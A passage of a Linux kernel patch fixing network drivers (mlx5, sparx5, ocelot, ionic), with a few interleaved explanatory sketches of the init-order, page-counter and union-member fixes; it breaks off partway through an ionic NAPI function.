+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/rep/bridge.c b/drivers/net/ethernet/mellanox/mlx5/core/en/rep/bridge.c
+index 8099a21e674c9..ce85b48d327da 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/rep/bridge.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/rep/bridge.c
+@@ -438,10 +438,6 @@ static int mlx5_esw_bridge_switchdev_event(struct notifier_block *nb,
+ 
+ 	switch (event) {
+ 	case SWITCHDEV_FDB_ADD_TO_BRIDGE:
+-		/* only handle the event on native eswtich of representor */
+-		if (!mlx5_esw_bridge_is_local(dev, rep, esw))
+-			break;
+-
+ 		fdb_info = container_of(info,
+ 					struct switchdev_notifier_fdb_info,
+ 					info);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+index 1892ccb889b3f..7cd36f4ac3efc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+@@ -443,7 +443,7 @@ void mlx5e_enable_cvlan_filter(struct mlx5e_flow_steering *fs, bool promisc)
+ 
+ void mlx5e_disable_cvlan_filter(struct mlx5e_flow_steering *fs, bool promisc)
+ {
+-	if (fs->vlan->cvlan_filter_disabled)
++	if (!fs->vlan || fs->vlan->cvlan_filter_disabled)
+ 		return;
+ 
+ 	fs->vlan->cvlan_filter_disabled = true;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 4dc149ef618c4..142ed2d98cd5d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -591,7 +591,8 @@ static int mlx5e_init_rxq_rq(struct mlx5e_channel *c, struct mlx5e_params *param
+ 	rq->ix           = c->ix;
+ 	rq->channel      = c;
+ 	rq->mdev         = mdev;
+-	rq->hw_mtu       = MLX5E_SW2HW_MTU(params, params->sw_mtu);
++	rq->hw_mtu =
++		MLX5E_SW2HW_MTU(params, params->sw_mtu) - ETH_FCS_LEN * !params->scatter_fcs_en;
+ 	rq->xdpsq        = &c->rq_xdpsq;
+ 	rq->stats        = &c->priv->channel_stats[c->ix]->rq;
+ 	rq->ptp_cyc2time = mlx5_rq_ts_translator(mdev);
+@@ -1014,35 +1015,6 @@ int mlx5e_flush_rq(struct mlx5e_rq *rq, int curr_state)
+ 	return mlx5e_rq_to_ready(rq, curr_state);
+ }
+ 
+-static int mlx5e_modify_rq_scatter_fcs(struct mlx5e_rq *rq, bool enable)
+-{
+-	struct mlx5_core_dev *mdev = rq->mdev;
+-
+-	void *in;
+-	void *rqc;
+-	int inlen;
+-	int err;
+-
+-	inlen = MLX5_ST_SZ_BYTES(modify_rq_in);
+-	in = kvzalloc(inlen, GFP_KERNEL);
+-	if (!in)
+-		return -ENOMEM;
+-
+-	rqc = MLX5_ADDR_OF(modify_rq_in, in, ctx);
+-
+-	MLX5_SET(modify_rq_in, in, rq_state, MLX5_RQC_STATE_RDY);
+-	MLX5_SET64(modify_rq_in, in, modify_bitmask,
+-		   MLX5_MODIFY_RQ_IN_MODIFY_BITMASK_SCATTER_FCS);
+-	MLX5_SET(rqc, rqc, scatter_fcs, enable);
+-	MLX5_SET(rqc, rqc, state, MLX5_RQC_STATE_RDY);
+-
+-	err = mlx5_core_modify_rq(mdev, rq->rqn, in);
+-
+-	kvfree(in);
+-
+-	return err;
+-}
+-
+ static int mlx5e_modify_rq_vsd(struct mlx5e_rq *rq, bool vsd)
+ {
+ 	struct mlx5_core_dev *mdev = rq->mdev;
+@@ -3301,20 +3273,6 @@ static void mlx5e_cleanup_nic_tx(struct mlx5e_priv *priv)
+ 	mlx5e_destroy_tises(priv);
+ }
+ 
+-static int mlx5e_modify_channels_scatter_fcs(struct mlx5e_channels *chs, bool enable)
+-{
+-	int err = 0;
+-	int i;
+-
+-	for (i = 0; i < chs->num; i++) {
+-		err = mlx5e_modify_rq_scatter_fcs(&chs->c[i]->rq, enable);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+ static int mlx5e_modify_channels_vsd(struct mlx5e_channels *chs, bool vsd)
+ {
+ 	int err;
+@@ -3890,41 +3848,27 @@ static int mlx5e_set_rx_port_ts(struct mlx5_core_dev *mdev, bool enable)
+ 	return mlx5_set_ports_check(mdev, in, sizeof(in));
+ }
+ 
++static int mlx5e_set_rx_port_ts_wrap(struct mlx5e_priv *priv, void *ctx)
++{
++	struct mlx5_core_dev *mdev = priv->mdev;
++	bool enable = *(bool *)ctx;
++
++	return mlx5e_set_rx_port_ts(mdev, enable);
++}
++
+ static int set_feature_rx_fcs(struct net_device *netdev, bool enable)
+ {
+ 	struct mlx5e_priv *priv = netdev_priv(netdev);
+ 	struct mlx5e_channels *chs = &priv->channels;
+-	struct mlx5_core_dev *mdev = priv->mdev;
++	struct mlx5e_params new_params;
+ 	int err;
+ 
+ 	mutex_lock(&priv->state_lock);
+ 
+-	if (enable) {
+-		err = mlx5e_set_rx_port_ts(mdev, false);
+-		if (err)
+-			goto out;
+-
+-		chs->params.scatter_fcs_en = true;
+-		err = mlx5e_modify_channels_scatter_fcs(chs, true);
+-		if (err) {
+-			chs->params.scatter_fcs_en = false;
+-			mlx5e_set_rx_port_ts(mdev, true);
+-		}
+-	} else {
+-		chs->params.scatter_fcs_en = false;
+-		err = mlx5e_modify_channels_scatter_fcs(chs, false);
+-		if (err) {
+-			chs->params.scatter_fcs_en = true;
+-			goto out;
+-		}
+-		err = mlx5e_set_rx_port_ts(mdev, true);
+-		if (err) {
+-			mlx5_core_warn(mdev, "Failed to set RX port timestamp %d\n", err);
+-			err = 0;
+-		}
+-	}
+-
+-out:
++	new_params = chs->params;
++	new_params.scatter_fcs_en = enable;
++	err = mlx5e_safe_switch_params(priv, &new_params, mlx5e_set_rx_port_ts_wrap,
++				       &new_params.scatter_fcs_en, true);
+ 	mutex_unlock(&priv->state_lock);
+ 	return err;
+ }
+@@ -4061,6 +4005,10 @@ static netdev_features_t mlx5e_fix_uplink_rep_features(struct net_device *netdev
+ 	if (netdev->features & NETIF_F_GRO_HW)
+ 		netdev_warn(netdev, "Disabling HW_GRO, not supported in switchdev mode\n");
+ 
++	features &= ~NETIF_F_HW_VLAN_CTAG_FILTER;
++	if (netdev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
++		netdev_warn(netdev, "Disabling HW_VLAN CTAG FILTERING, not supported in switchdev mode\n");
++
+ 	return features;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/bridge.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/bridge.c
+index 4fbff7bcc1556..d0b2676c32145 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/bridge.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/bridge.c
+@@ -1715,7 +1715,7 @@ void mlx5_esw_bridge_fdb_update_used(struct net_device *dev, u16 vport_num, u16
+ 	struct mlx5_esw_bridge *bridge;
+ 
+ 	port = mlx5_esw_bridge_port_lookup(vport_num, esw_owner_vhca_id, br_offloads);
+-	if (!port || port->flags & MLX5_ESW_BRIDGE_PORT_FLAG_PEER)
++	if (!port)
+ 		return;
+ 
+ 	bridge = port->bridge;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
+index eff92dc0927c1..e09518f887a04 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ethtool.c
+@@ -189,16 +189,16 @@ static inline int mlx5_ptys_rate_enum_to_int(enum mlx5_ptys_rate rate)
+ 	}
+ }
+ 
+-static int mlx5i_get_speed_settings(u16 ib_link_width_oper, u16 ib_proto_oper)
++static u32 mlx5i_get_speed_settings(u16 ib_link_width_oper, u16 ib_proto_oper)
+ {
+ 	int rate, width;
+ 
+ 	rate = mlx5_ptys_rate_enum_to_int(ib_proto_oper);
+ 	if (rate < 0)
+-		return -EINVAL;
++		return SPEED_UNKNOWN;
+ 	width = mlx5_ptys_width_enum_to_int(ib_link_width_oper);
+ 	if (width < 0)
+-		return -EINVAL;
++		return SPEED_UNKNOWN;
+ 
+ 	return rate * width;
+ }
+@@ -221,16 +221,13 @@ static int mlx5i_get_link_ksettings(struct net_device *netdev,
+ 	ethtool_link_ksettings_zero_link_mode(link_ksettings, advertising);
+ 
+ 	speed = mlx5i_get_speed_settings(ib_link_width_oper, ib_proto_oper);
+-	if (speed < 0)
+-		return -EINVAL;
++	link_ksettings->base.speed = speed;
++	link_ksettings->base.duplex = speed == SPEED_UNKNOWN ? DUPLEX_UNKNOWN : DUPLEX_FULL;
+ 
+-	link_ksettings->base.duplex = DUPLEX_FULL;
+ 	link_ksettings->base.port = PORT_OTHER;
+ 
+ 	link_ksettings->base.autoneg = AUTONEG_DISABLE;
+ 
+-	link_ksettings->base.speed = speed;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index d4db1adae3e3d..f07175549a87d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -2094,7 +2094,7 @@ static int __init mlx5_init(void)
+ 	mlx5_core_verify_params();
+ 	mlx5_register_debugfs();
+ 
+-	err = pci_register_driver(&mlx5_core_driver);
++	err = mlx5e_init();
+ 	if (err)
+ 		goto err_debug;
+ 
+@@ -2102,16 +2102,16 @@ static int __init mlx5_init(void)
+ 	if (err)
+ 		goto err_sf;
+ 
+-	err = mlx5e_init();
++	err = pci_register_driver(&mlx5_core_driver);
+ 	if (err)
+-		goto err_en;
++		goto err_pci;
+ 
+ 	return 0;
+ 
+-err_en:
++err_pci:
+ 	mlx5_sf_driver_unregister();
+ err_sf:
+-	pci_unregister_driver(&mlx5_core_driver);
++	mlx5e_cleanup();
+ err_debug:
+ 	mlx5_unregister_debugfs();
+ 	return err;
+@@ -2119,9 +2119,9 @@ err_debug:
+ 
+ static void __exit mlx5_cleanup(void)
+ {
+-	mlx5e_cleanup();
+-	mlx5_sf_driver_unregister();
+ 	pci_unregister_driver(&mlx5_core_driver);
++	mlx5_sf_driver_unregister();
++	mlx5e_cleanup();
+ 	mlx5_unregister_debugfs();
+ }
+ 
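A generic sketch of the invariant this reorder restores (helper names invented): bring dependencies up before anything that can trigger probe, register the PCI driver last, and unwind in strict reverse order on both the error path and module exit:

static int __init mod_init(void)
{
	int err;

	err = init_subsystem();		/* needed by probe */
	if (err)
		return err;
	err = register_pci_driver();	/* may probe immediately: last */
	if (err)
		goto err_subsystem;
	return 0;

err_subsystem:
	cleanup_subsystem();
	return err;
}

static void __exit mod_exit(void)
{
	unregister_pci_driver();	/* reverse (LIFO) order */
	cleanup_subsystem();
}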
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 60596357bfc7a..0eb50be175cc4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -74,6 +74,14 @@ static u32 get_function(u16 func_id, bool ec_function)
+ 	return (u32)func_id | (ec_function << 16);
+ }
+ 
++static u16 func_id_to_type(struct mlx5_core_dev *dev, u16 func_id, bool ec_function)
++{
++	if (!func_id)
++		return mlx5_core_is_ecpf(dev) && !ec_function ? MLX5_HOST_PF : MLX5_PF;
++
++	return func_id <= mlx5_core_max_vfs(dev) ?  MLX5_VF : MLX5_SF;
++}
++
+ static struct rb_root *page_root_per_function(struct mlx5_core_dev *dev, u32 function)
+ {
+ 	struct rb_root *root;
+@@ -332,6 +340,7 @@ static int give_pages(struct mlx5_core_dev *dev, u16 func_id, int npages,
+ 	u32 out[MLX5_ST_SZ_DW(manage_pages_out)] = {0};
+ 	int inlen = MLX5_ST_SZ_BYTES(manage_pages_in);
+ 	int notify_fail = event;
++	u16 func_type;
+ 	u64 addr;
+ 	int err;
+ 	u32 *in;
+@@ -383,11 +392,9 @@ retry:
+ 		goto out_dropped;
+ 	}
+ 
++	func_type = func_id_to_type(dev, func_id, ec_function);
++	dev->priv.page_counters[func_type] += npages;
+ 	dev->priv.fw_pages += npages;
+-	if (func_id)
+-		dev->priv.vfs_pages += npages;
+-	else if (mlx5_core_is_ecpf(dev) && !ec_function)
+-		dev->priv.host_pf_pages += npages;
+ 
+ 	mlx5_core_dbg(dev, "npages %d, ec_function %d, func_id 0x%x, err %d\n",
+ 		      npages, ec_function, func_id, err);
+@@ -414,6 +421,7 @@ static void release_all_pages(struct mlx5_core_dev *dev, u16 func_id,
+ 	struct rb_root *root;
+ 	struct rb_node *p;
+ 	int npages = 0;
++	u16 func_type;
+ 
+ 	root = xa_load(&dev->priv.page_root_xa, function);
+ 	if (WARN_ON_ONCE(!root))
+@@ -428,11 +436,9 @@ static void release_all_pages(struct mlx5_core_dev *dev, u16 func_id,
+ 		free_fwp(dev, fwp, fwp->free_count);
+ 	}
+ 
++	func_type = func_id_to_type(dev, func_id, ec_function);
++	dev->priv.page_counters[func_type] -= npages;
+ 	dev->priv.fw_pages -= npages;
+-	if (func_id)
+-		dev->priv.vfs_pages -= npages;
+-	else if (mlx5_core_is_ecpf(dev) && !ec_function)
+-		dev->priv.host_pf_pages -= npages;
+ 
+ 	mlx5_core_dbg(dev, "npages %d, ec_function %d, func_id 0x%x\n",
+ 		      npages, ec_function, func_id);
+@@ -498,6 +504,7 @@ static int reclaim_pages(struct mlx5_core_dev *dev, u16 func_id, int npages,
+ 	int outlen = MLX5_ST_SZ_BYTES(manage_pages_out);
+ 	u32 in[MLX5_ST_SZ_DW(manage_pages_in)] = {};
+ 	int num_claimed;
++	u16 func_type;
+ 	u32 *out;
+ 	int err;
+ 	int i;
+@@ -549,11 +556,9 @@ static int reclaim_pages(struct mlx5_core_dev *dev, u16 func_id, int npages,
+ 	if (nclaimed)
+ 		*nclaimed = num_claimed;
+ 
++	func_type = func_id_to_type(dev, func_id, ec_function);
++	dev->priv.page_counters[func_type] -= num_claimed;
+ 	dev->priv.fw_pages -= num_claimed;
+-	if (func_id)
+-		dev->priv.vfs_pages -= num_claimed;
+-	else if (mlx5_core_is_ecpf(dev) && !ec_function)
+-		dev->priv.host_pf_pages -= num_claimed;
+ 
+ out_free:
+ 	kvfree(out);
+@@ -706,12 +711,12 @@ int mlx5_reclaim_startup_pages(struct mlx5_core_dev *dev)
+ 	WARN(dev->priv.fw_pages,
+ 	     "FW pages counter is %d after reclaiming all pages\n",
+ 	     dev->priv.fw_pages);
+-	WARN(dev->priv.vfs_pages,
++	WARN(dev->priv.page_counters[MLX5_VF],
+ 	     "VFs FW pages counter is %d after reclaiming all pages\n",
+-	     dev->priv.vfs_pages);
+-	WARN(dev->priv.host_pf_pages,
++	     dev->priv.page_counters[MLX5_VF]);
++	WARN(dev->priv.page_counters[MLX5_HOST_PF],
+ 	     "External host PF FW pages counter is %d after reclaiming all pages\n",
+-	     dev->priv.host_pf_pages);
++	     dev->priv.page_counters[MLX5_HOST_PF]);
+ 
+ 	return 0;
+ }
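The bookkeeping change, reduced: one array indexed by function type replaces the two ad-hoc counters, so SF pages are accounted separately instead of being lumped in with VFs (enum layout assumed from the names used in the hunks above):

enum mlx5_func_type {
	MLX5_PF,
	MLX5_VF,
	MLX5_SF,
	MLX5_HOST_PF,
	MLX5_FUNC_TYPE_NUM,
};

/* replaces priv.vfs_pages and priv.host_pf_pages */
u32 page_counters[MLX5_FUNC_TYPE_NUM];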
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+index c0e6c487c63c1..3008e9ce2bbff 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+@@ -147,7 +147,7 @@ mlx5_device_disable_sriov(struct mlx5_core_dev *dev, int num_vfs, bool clear_vf)
+ 
+ 	mlx5_eswitch_disable_sriov(dev->priv.eswitch, clear_vf);
+ 
+-	if (mlx5_wait_for_pages(dev, &dev->priv.vfs_pages))
++	if (mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]))
+ 		mlx5_core_warn(dev, "timeout reclaiming VFs pages\n");
+ }
+ 
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_ptp.c b/drivers/net/ethernet/microchip/sparx5/sparx5_ptp.c
+index 0ed1ea7727c54..69e76634f9aa8 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_ptp.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_ptp.c
+@@ -633,7 +633,7 @@ int sparx5_ptp_init(struct sparx5 *sparx5)
+ 	/* Enable master counters */
+ 	spx5_wr(PTP_PTP_DOM_CFG_PTP_ENA_SET(0x7), sparx5, PTP_PTP_DOM_CFG);
+ 
+-	for (i = 0; i < sparx5->port_count; i++) {
++	for (i = 0; i < SPX5_PORTS; i++) {
+ 		port = sparx5->ports[i];
+ 		if (!port)
+ 			continue;
+@@ -649,7 +649,7 @@ void sparx5_ptp_deinit(struct sparx5 *sparx5)
+ 	struct sparx5_port *port;
+ 	int i;
+ 
+-	for (i = 0; i < sparx5->port_count; i++) {
++	for (i = 0; i < SPX5_PORTS; i++) {
+ 		port = sparx5->ports[i];
+ 		if (!port)
+ 			continue;
+diff --git a/drivers/net/ethernet/mscc/ocelot_flower.c b/drivers/net/ethernet/mscc/ocelot_flower.c
+index 7c0897e779dc6..ee052404eb55a 100644
+--- a/drivers/net/ethernet/mscc/ocelot_flower.c
++++ b/drivers/net/ethernet/mscc/ocelot_flower.c
+@@ -605,6 +605,18 @@ ocelot_flower_parse_key(struct ocelot *ocelot, int port, bool ingress,
+ 		flow_rule_match_control(rule, &match);
+ 	}
+ 
++	if (flow_rule_match_key(rule, FLOW_DISSECTOR_KEY_VLAN)) {
++		struct flow_match_vlan match;
++
++		flow_rule_match_vlan(rule, &match);
++		filter->key_type = OCELOT_VCAP_KEY_ANY;
++		filter->vlan.vid.value = match.key->vlan_id;
++		filter->vlan.vid.mask = match.mask->vlan_id;
++		filter->vlan.pcp.value[0] = match.key->vlan_priority;
++		filter->vlan.pcp.mask[0] = match.mask->vlan_priority;
++		match_protocol = false;
++	}
++
+ 	if (flow_rule_match_key(rule, FLOW_DISSECTOR_KEY_ETH_ADDRS)) {
+ 		struct flow_match_eth_addrs match;
+ 
+@@ -737,18 +749,6 @@ ocelot_flower_parse_key(struct ocelot *ocelot, int port, bool ingress,
+ 		match_protocol = false;
+ 	}
+ 
+-	if (flow_rule_match_key(rule, FLOW_DISSECTOR_KEY_VLAN)) {
+-		struct flow_match_vlan match;
+-
+-		flow_rule_match_vlan(rule, &match);
+-		filter->key_type = OCELOT_VCAP_KEY_ANY;
+-		filter->vlan.vid.value = match.key->vlan_id;
+-		filter->vlan.vid.mask = match.mask->vlan_id;
+-		filter->vlan.pcp.value[0] = match.key->vlan_priority;
+-		filter->vlan.pcp.mask[0] = match.mask->vlan_priority;
+-		match_protocol = false;
+-	}
+-
+ finished_key_parsing:
+ 	if (match_protocol && proto != ETH_P_ALL) {
+ 		if (filter->block_id == VCAP_ES0) {
+diff --git a/drivers/net/ethernet/mscc/ocelot_ptp.c b/drivers/net/ethernet/mscc/ocelot_ptp.c
+index 1a82f10c88539..2180ae94c7447 100644
+--- a/drivers/net/ethernet/mscc/ocelot_ptp.c
++++ b/drivers/net/ethernet/mscc/ocelot_ptp.c
+@@ -335,8 +335,8 @@ static void
+ ocelot_populate_ipv6_ptp_event_trap_key(struct ocelot_vcap_filter *trap)
+ {
+ 	trap->key_type = OCELOT_VCAP_KEY_IPV6;
+-	trap->key.ipv4.proto.value[0] = IPPROTO_UDP;
+-	trap->key.ipv4.proto.mask[0] = 0xff;
++	trap->key.ipv6.proto.value[0] = IPPROTO_UDP;
++	trap->key.ipv6.proto.mask[0] = 0xff;
+ 	trap->key.ipv6.dport.value = PTP_EV_PORT;
+ 	trap->key.ipv6.dport.mask = 0xffff;
+ }
+@@ -355,8 +355,8 @@ static void
+ ocelot_populate_ipv6_ptp_general_trap_key(struct ocelot_vcap_filter *trap)
+ {
+ 	trap->key_type = OCELOT_VCAP_KEY_IPV6;
+-	trap->key.ipv4.proto.value[0] = IPPROTO_UDP;
+-	trap->key.ipv4.proto.mask[0] = 0xff;
++	trap->key.ipv6.proto.value[0] = IPPROTO_UDP;
++	trap->key.ipv6.proto.mask[0] = 0xff;
+ 	trap->key.ipv6.dport.value = PTP_GEN_PORT;
+ 	trap->key.ipv6.dport.mask = 0xffff;
+ }
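A toy reproduction of the bug class fixed above (layouts invented for illustration, not ocelot's real key structs): writing through the wrong member of a key union lands the stores on whatever fields of the sibling variant happen to overlap:

#include <stdio.h>
#include <string.h>

union key {
	struct { unsigned char proto; unsigned short dport; } v4;
	struct { unsigned short dport; unsigned char proto; } v6;
};

int main(void)
{
	union key k;

	memset(&k, 0, sizeof(k));
	k.v6.dport = 319;	/* PTP event port */
	k.v4.proto = 17;	/* wrong member: overlaps v6.dport */
	printf("v6.dport is now %u\n", k.v6.dport); /* no longer 319 */
	return 0;
}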
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.c b/drivers/net/ethernet/pensando/ionic/ionic_dev.c
+index 9d0514cfeb5c2..344a3924627d4 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.c
+@@ -694,9 +694,16 @@ void ionic_q_post(struct ionic_queue *q, bool ring_doorbell, ionic_desc_cb cb,
+ 		q->lif->index, q->name, q->hw_type, q->hw_index,
+ 		q->head_idx, ring_doorbell);
+ 
+-	if (ring_doorbell)
++	if (ring_doorbell) {
+ 		ionic_dbell_ring(lif->kern_dbpage, q->hw_type,
+ 				 q->dbval | q->head_idx);
++
++		q->dbell_jiffies = jiffies;
++
++		if (q_to_qcq(q)->napi_qcq)
++			mod_timer(&q_to_qcq(q)->napi_qcq->napi_deadline,
++				  jiffies + IONIC_NAPI_DEADLINE);
++	}
+ }
+ 
+ static bool ionic_q_is_posted(struct ionic_queue *q, unsigned int pos)
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.h b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+index 563c302eb033d..ad8a2a4453b76 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+@@ -25,6 +25,12 @@
+ #define IONIC_DEV_INFO_REG_COUNT	32
+ #define IONIC_DEV_CMD_REG_COUNT		32
+ 
++#define IONIC_NAPI_DEADLINE		(HZ / 200)	/* 5ms */
++#define IONIC_ADMIN_DOORBELL_DEADLINE	(HZ / 2)	/* 500ms */
++#define IONIC_TX_DOORBELL_DEADLINE	(HZ / 100)	/* 10ms */
++#define IONIC_RX_MIN_DOORBELL_DEADLINE	(HZ / 100)	/* 10ms */
++#define IONIC_RX_MAX_DOORBELL_DEADLINE	(HZ * 5)	/* 5s */
++
+ struct ionic_dev_bar {
+ 	void __iomem *vaddr;
+ 	phys_addr_t bus_addr;
+@@ -214,6 +220,8 @@ struct ionic_queue {
+ 	struct ionic_lif *lif;
+ 	struct ionic_desc_info *info;
+ 	u64 dbval;
++	unsigned long dbell_deadline;
++	unsigned long dbell_jiffies;
+ 	u16 head_idx;
+ 	u16 tail_idx;
+ 	unsigned int index;
+@@ -358,4 +366,8 @@ void ionic_q_service(struct ionic_queue *q, struct ionic_cq_info *cq_info,
+ int ionic_heartbeat_check(struct ionic *ionic);
+ bool ionic_is_fw_running(struct ionic_dev *idev);
+ 
++bool ionic_adminq_poke_doorbell(struct ionic_queue *q);
++bool ionic_txq_poke_doorbell(struct ionic_queue *q);
++bool ionic_rxq_poke_doorbell(struct ionic_queue *q);
++
+ #endif /* _IONIC_DEV_H_ */
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index 19d4848df17df..159bfcc76498c 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -16,6 +16,7 @@
+ 
+ #include "ionic.h"
+ #include "ionic_bus.h"
++#include "ionic_dev.h"
+ #include "ionic_lif.h"
+ #include "ionic_txrx.h"
+ #include "ionic_ethtool.h"
+@@ -200,6 +201,13 @@ void ionic_link_status_check_request(struct ionic_lif *lif, bool can_sleep)
+ 	}
+ }
+ 
++static void ionic_napi_deadline(struct timer_list *timer)
++{
++	struct ionic_qcq *qcq = container_of(timer, struct ionic_qcq, napi_deadline);
++
++	napi_schedule(&qcq->napi);
++}
++
+ static irqreturn_t ionic_isr(int irq, void *data)
+ {
+ 	struct napi_struct *napi = data;
+@@ -269,6 +277,7 @@ static int ionic_qcq_enable(struct ionic_qcq *qcq)
+ 			.oper = IONIC_Q_ENABLE,
+ 		},
+ 	};
++	int ret;
+ 
+ 	idev = &lif->ionic->idev;
+ 	dev = lif->ionic->dev;
+@@ -276,16 +285,24 @@ static int ionic_qcq_enable(struct ionic_qcq *qcq)
+ 	dev_dbg(dev, "q_enable.index %d q_enable.qtype %d\n",
+ 		ctx.cmd.q_control.index, ctx.cmd.q_control.type);
+ 
++	if (qcq->flags & IONIC_QCQ_F_INTR)
++		ionic_intr_clean(idev->intr_ctrl, qcq->intr.index);
++
++	ret = ionic_adminq_post_wait(lif, &ctx);
++	if (ret)
++		return ret;
++
++	if (qcq->napi.poll)
++		napi_enable(&qcq->napi);
++
+ 	if (qcq->flags & IONIC_QCQ_F_INTR) {
+ 		irq_set_affinity_hint(qcq->intr.vector,
+ 				      &qcq->intr.affinity_mask);
+-		napi_enable(&qcq->napi);
+-		ionic_intr_clean(idev->intr_ctrl, qcq->intr.index);
+ 		ionic_intr_mask(idev->intr_ctrl, qcq->intr.index,
+ 				IONIC_INTR_MASK_CLEAR);
+ 	}
+ 
+-	return ionic_adminq_post_wait(lif, &ctx);
++	return 0;
+ }
+ 
+ static int ionic_qcq_disable(struct ionic_lif *lif, struct ionic_qcq *qcq, int fw_err)
+@@ -316,6 +333,7 @@ static int ionic_qcq_disable(struct ionic_lif *lif, struct ionic_qcq *qcq, int f
+ 		synchronize_irq(qcq->intr.vector);
+ 		irq_set_affinity_hint(qcq->intr.vector, NULL);
+ 		napi_disable(&qcq->napi);
++		del_timer_sync(&qcq->napi_deadline);
+ 	}
+ 
+ 	/* If there was a previous fw communication error, don't bother with
+@@ -451,6 +469,7 @@ static void ionic_link_qcq_interrupts(struct ionic_qcq *src_qcq,
+ 
+ 	n_qcq->intr.vector = src_qcq->intr.vector;
+ 	n_qcq->intr.index = src_qcq->intr.index;
++	n_qcq->napi_qcq = src_qcq->napi_qcq;
+ }
+ 
+ static int ionic_alloc_qcq_interrupt(struct ionic_lif *lif, struct ionic_qcq *qcq)
+@@ -773,8 +792,14 @@ static int ionic_lif_txq_init(struct ionic_lif *lif, struct ionic_qcq *qcq)
+ 	dev_dbg(dev, "txq->hw_type %d\n", q->hw_type);
+ 	dev_dbg(dev, "txq->hw_index %d\n", q->hw_index);
+ 
+-	if (test_bit(IONIC_LIF_F_SPLIT_INTR, lif->state))
++	q->dbell_deadline = IONIC_TX_DOORBELL_DEADLINE;
++	q->dbell_jiffies = jiffies;
++
++	if (test_bit(IONIC_LIF_F_SPLIT_INTR, lif->state)) {
+ 		netif_napi_add(lif->netdev, &qcq->napi, ionic_tx_napi);
++		qcq->napi_qcq = qcq;
++		timer_setup(&qcq->napi_deadline, ionic_napi_deadline, 0);
++	}
+ 
+ 	qcq->flags |= IONIC_QCQ_F_INITED;
+ 
+@@ -828,11 +853,17 @@ static int ionic_lif_rxq_init(struct ionic_lif *lif, struct ionic_qcq *qcq)
+ 	dev_dbg(dev, "rxq->hw_type %d\n", q->hw_type);
+ 	dev_dbg(dev, "rxq->hw_index %d\n", q->hw_index);
+ 
++	q->dbell_deadline = IONIC_RX_MIN_DOORBELL_DEADLINE;
++	q->dbell_jiffies = jiffies;
++
+ 	if (test_bit(IONIC_LIF_F_SPLIT_INTR, lif->state))
+ 		netif_napi_add(lif->netdev, &qcq->napi, ionic_rx_napi);
+ 	else
+ 		netif_napi_add(lif->netdev, &qcq->napi, ionic_txrx_napi);
+ 
++	qcq->napi_qcq = qcq;
++	timer_setup(&qcq->napi_deadline, ionic_napi_deadline, 0);
++
+ 	qcq->flags |= IONIC_QCQ_F_INITED;
+ 
+ 	return 0;
+@@ -1150,6 +1181,7 @@ static int ionic_adminq_napi(struct napi_struct *napi, int budget)
+ 	struct ionic_dev *idev = &lif->ionic->idev;
+ 	unsigned long irqflags;
+ 	unsigned int flags = 0;
++	bool resched = false;
+ 	int rx_work = 0;
+ 	int tx_work = 0;
+ 	int n_work = 0;
+@@ -1187,6 +1219,16 @@ static int ionic_adminq_napi(struct napi_struct *napi, int budget)
+ 		ionic_intr_credits(idev->intr_ctrl, intr->index, credits, flags);
+ 	}
+ 
++	if (!a_work && ionic_adminq_poke_doorbell(&lif->adminqcq->q))
++		resched = true;
++	if (lif->hwstamp_rxq && !rx_work && ionic_rxq_poke_doorbell(&lif->hwstamp_rxq->q))
++		resched = true;
++	if (lif->hwstamp_txq && !tx_work && ionic_txq_poke_doorbell(&lif->hwstamp_txq->q))
++		resched = true;
